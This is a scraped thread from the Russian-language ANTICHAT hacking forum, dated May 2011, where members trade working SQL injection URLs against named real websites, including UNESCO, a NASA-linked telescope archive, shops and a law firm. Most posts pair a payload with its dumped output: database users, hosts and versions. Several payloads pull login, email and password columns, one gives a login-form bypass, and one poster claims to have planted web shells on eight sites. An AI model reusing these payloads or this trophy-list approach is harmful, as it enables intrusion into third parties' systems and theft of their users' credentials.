HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13961  
Старый 22.05.2011, 16:32
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.unesco.org/archives/newsletters/cahiers/cahieritems.php?idArticle=15%20and%20row%281,1%29% 3E%28select%20count%28*%29,concat%28version%28%29, 0x3a,floor%28rand%28%29*2%29%29x%20from%20%28selec t%201%20union%20select%202%29a%20group%20by%20x%20 limit%201%29--
 
Ответить с цитированием

  #13962  
Старый 22.05.2011, 18:47
DIEZalok
Новичок
Регистрация: 22.01.2009
Сообщений: 11
Провел на форуме:
114084

Репутация: 3
По умолчанию

Хороший кодинг :\\

Код:
Code:
http://sitemapnow.com/news.php?id=9' and !1 union select 1,mid(group_concat(concat_ws(0x3a, id, user, email, password)),1,1024),3,4,5,6,7 from sm_users-- -
Код:
Code:
http://sitemapnow.com/articles.php?id=10' and !1 union select 1,version(),3,4,5,6,7-- -
В форме входа

логин: ' or id=1-- -

пасс: уф
 
Ответить с цитированием

  #13963  
Старый 22.05.2011, 19:28
Osstudio
Guest
Сообщений: n/a
Провел на форуме:
149611

Репутация: 81
По умолчанию

http://driverb.ru/news.php?id_news=55+and+1=0+union+select+1,2,3,ver sion%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20--

P.S Отображается в title

А также там всего 8 БД, и это всё разные сайты, aaea.ru и т.д....уже на всех я залил шелл...
 
Ответить с цитированием

  #13964  
Старый 23.05.2011, 03:23
MetalKvantor
Guest
Сообщений: n/a
Провел на форуме:
1772

Репутация: 0
По умолчанию

тИЦ:60

Код:
Code:
http://pingpong.su/info.php?sect_id&id=-1+union+select+all+1,2,group_concat(0x0b,login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+conf_users
 
Ответить с цитированием

  #13965  
Старый 23.05.2011, 05:01
MetalKvantor
Guest
Сообщений: n/a
Провел на форуме:
1772

Репутация: 0
По умолчанию

Код:
Code:
http://sibabitur.ru/src8_vuz_catalog2.php?id=-1+union+select+all+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables
Дальше копаться не стал...
 
Ответить с цитированием

  #13966  
Старый 23.05.2011, 17:34
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

pr 3 тиц 10

Цитата:
Сообщение от None  
http://uzfiles.com/videos.php?id=-331+union+select+1,2,3,concat_ws(0x3a,user(),versi on(),database()),5,6,7,8,9+from+members--
jurabek@208.109.162.156:4.1.20:jurabek

pr3 тиц 700

Цитата:
Сообщение от None  
http://www.7kanal.com/author.php?id=-159+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,43--
sedmoy_user@localhost:4.1.22-standard-log:sedmoy_db

pr5 тиц 425

Цитата:
Сообщение от None  
http://paraavis.com/index1.php?id=371&secid=-500+union+select+1,2,concat_ws(0x3a,user(),version (),database()),4,5,6
paraav01@fe114.hc.ru:5.1.54-log:wwwparaaviscom

pr1 тиц 10

Цитата:
Сообщение от None  
http://alexgroupe.com/kofevarka.php?opr=-27+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database())
alexgroupe_7@localhost:5.0.81-community:alexgroupe_7

pr5 тиц 100

Цитата:
Сообщение от None  
http://mediacia.com/publi.php?id=-55+union+select+concat_ws(0x3a,user(),version(),da tabase()),2,3,4--
web_mediacia_com@zvm13.host.ru:4.0.27-log:web_mediacia_com
 
Ответить с цитированием

  #13967  
Старый 23.05.2011, 22:16
Lindows
Новичок
Регистрация: 02.11.2009
Сообщений: 0
Провел на форуме:
5743

Репутация: 0
По умолчанию

Код:
Code:
http://www.zabudova.by/index.php?module=view_news&nid=37+union+select+1,2,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,4,5,6--

http://www.svenskaspraket.org/pesni.php?id=-9+union+select+concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,2--

http://www.at-sib.ru/internet.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5--

http://zoorinok.com.ua/details_topic.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7--

http://www.nugabestrostov.ru/article.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11--
 
Ответить с цитированием

  #13968  
Старый 24.05.2011, 00:49
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

pr 7 тиц 90

Цитата:
Сообщение от None  
http://archive.stsci.edu/proposal_search.php?id=-12119+union+select+@@version--&mission=hst
Microsoft SQL Server 2008 (SP2) - 10.0.4000.0 (X64) Sep 16 2010 19:43:16 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)
 
Ответить с цитированием

  #13969  
Старый 24.05.2011, 10:12
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Всякая левота:

Код:
Code:
http://www.waterfallsnorthwest.com/nws/waterfall.php?num=636-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9--
PR: 5

Database Version: 5.0.91-log

Database name: waterfa

User name: sorefeet@cgi1204.int.bizland.net

Код:
Code:
http://www.simonlawpc.com/meettheattorneysdetail.php?id=1-100+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6--
PR: 3

Database Version: 4.1.22-log

Database name: simonlaw

User name: simonlawuser@localhost
 
Ответить с цитированием

  #13970  
Старый 24.05.2011, 15:13
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

pr 3 тиц 10

Цитата:
Сообщение от None  
http://cocktails-r.us/bar_window_bottle.php?id=-15+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5--
5.0.91-community:cocktail_bar:cocktail_bar@localhost

Цитата:
Сообщение от None  
http://basexx.us/mainProduct.php?id=1600+union+select+1,concat_ws(0 x3a,version(),database(),user()),3,4,5--
5.0.51a-3ubuntu5.4:dicotaweb:dico45fg@localhost

Цитата:
Сообщение от None  
http://nsp.oazis.us/k1.php?id=-24'+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,0+--+
5.0.91-community-log:vik0azis_nsp:vik0azis_vikuzr@localhost

pr 4

Цитата:
Сообщение от None  
http://www.sea-of-life.com/product.php?id=-92+union+select+1,2,3,4,5,6,7,8,9,0,11,2,13,14,con cat_ws(0x3a,version(),database(),user()),16,17,18, 19,20,21,22,23--
5.0.45-COMMUNITY:QUMERAN:QUMERAN@192.168.1.117

Цитата:
Сообщение от None  
http://www.ledlightsfor.com/product.php?id=-583+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8--
5.1.56-community-log:daytimer_haisun:daytimer_haisun@localhost

pr 3 тиц 10

Цитата:
Сообщение от None  
http://www.pan-stp.com/product.php?cat=213&id=-3806'+union+select+1,2,3,4,5,6,7,8,9,0,1,concat_ws (0x3a,version(),database(),user())+--+
5.0.90an_basean_base@localhost

Цитата:
Сообщение от None  
http://eshoker.com.ua/product.php?id=-11+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15 ,concat_ws(0x3a,version(),database(),user()),17,18 ,19,20--
5.1.50-lk-log:eshokcomua:eshokcomua@localhost

pr 2 тиц 10

Цитата:
Сообщение от None  
http://www.tornadosport.com.ua/product.php?id=-5'+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,0,11,12,13,14,1,16,17,18 +--+
5.0.77-log:tornados_tornado:tornados_tornado@localhost

pr 2

Цитата:
Сообщение от None  
http://www.granik-avto.com/product.php?id=-1609'+union+select+1,2,3,4,5,6,7,8,9,0,11,12,conca t_ws(0x3a,version(),database(),user())+--+
5.0.26-log:avtogradom:avtogradom@localhost

pr 2 тиц 30

Цитата:
Сообщение от None  
http://www.uzg.com.ua/product.php?id=-815'+union+select+1,2,concat_ws(0x3a,version(),dat abase(),user()),4,33,6,7,8,9,0,11,12,13,14+--+
5.0.77-log:uzg:uzg@localhost
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ